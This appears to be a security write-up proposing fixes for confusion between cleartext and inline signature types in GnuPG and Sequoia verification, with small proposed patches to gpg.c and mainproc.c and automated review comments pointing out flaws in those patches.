2. Only verify the signature type specified on the command line. User asks for cleartext -> give them cleartext or nothing.
GPG Option 2
Introduce a new command for verification of cleartext signatures. Accept cleartext signatures only if this command was used. In case no command is provided, the verified data is implicitly printed. Cleartext signatures can be accepted in this case because tampering should be visible in the output. Optionally, signature type detection could include cleartext signatures if an output option was specified.
Handling cleartext signatures in a separate verification command also makes deprecating this message type easier.
GPG Option 3
A default output file for verification can be set here. STDOUT/STDERR might be dangerous due to binary output, other files are likely a bad default. This should be paired with asking users before printing binary output, skipping binary output or printing as hexadecimal.
diff --git a/g10/gpg.c b/g10/gpg.c
index 99fe5b844..5f80c93e7 100644
--- a/g10/gpg.c
+++ b/g10/gpg.c
@@ -4698,6 +4698,8 @@ main (int argc, char **argv)
break;
case aVerify:
+ if (!opt.outfile)
+ opt.outfile = "-";
if (multifile)
{
if ((rc = verify_files (ctrl, argc, argv)))
GPG Option 3.1
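Review bot: `opt.outfile = "-"` under `case aVerify:` sends the verified literal data to stdout unconditionally, binary payloads included; the GPG Option 3 text says such a default has to be paired with prompting, skipping or hex-dumping binary output, and none of that is in this hunk. The default is also applied without looking at `opt.outfp`, which the mainproc.c hunk treats as an equivalent explicit output, and it changes what existing scripts see on stdout from `gpg --verify` (previously nothing for inline and cleartext signatures), so it needs a NEWS entry and a man page update alongside the code.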
Inform the user once about the dangers of verifying signatures without checking what was verified. Does not output a warning if an output was explicitly defined or was activated implicitly because no command was given.
diff --git a/g10/mainproc.c b/g10/mainproc.c
index 8108a07b7..b73580f13 100644
--- a/g10/mainproc.c
+++ b/g10/mainproc.c
@@ -234,6 +234,13 @@ add_signature (CTX c, PACKET *pkt)
{
kbnode_t node;
+ if (!c->any.sig_seen && !c->signed_data.used
+ && !(opt.outfp || opt.outfile || !c->sigs_only))
+ {
+ log_error ("WARNING: Verified data might differ from assumed input,\n");
+ log_error ("use --output to validate actual signed data.");
+ }
+
c->any.sig_seen = 1;
if (pkt->pkttype == PKT_SIGNATURE && !c->list)
{
Sequoia Verification Recommendations
Documentation, CLI and man page describe separate verification options. However, (inline) message verification and cleartext verification are passed to the same handler internally.
There should be separate builders and verifiers for both types, as this behaviour is security relevant; it is also what users would expect from the man page. Only the documentation states that sequoia tries to verify regardless of the type provided by the user.
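Review bot: emitting this warning with `log_error` turns a successful verification into a failure for callers that check the exit status: GnuPG's log_error increments the error counter, and gpg's exit path maps a non-zero error count to exit code 2, so a good signature verified without --output would exit non-zero. A warning belongs in `log_info` (GnuPG prefixes it with "gpg: " as usual). Also, the second message should end with "\n" like the first, because the log functions do not append a newline themselves. The condition itself reads correctly against the prose: `!(opt.outfp || opt.outfile || !c->sigs_only)` restricts the warning to --verify runs with no explicit output, and `!c->any.sig_seen && !c->signed_data.used` makes it fire once per context.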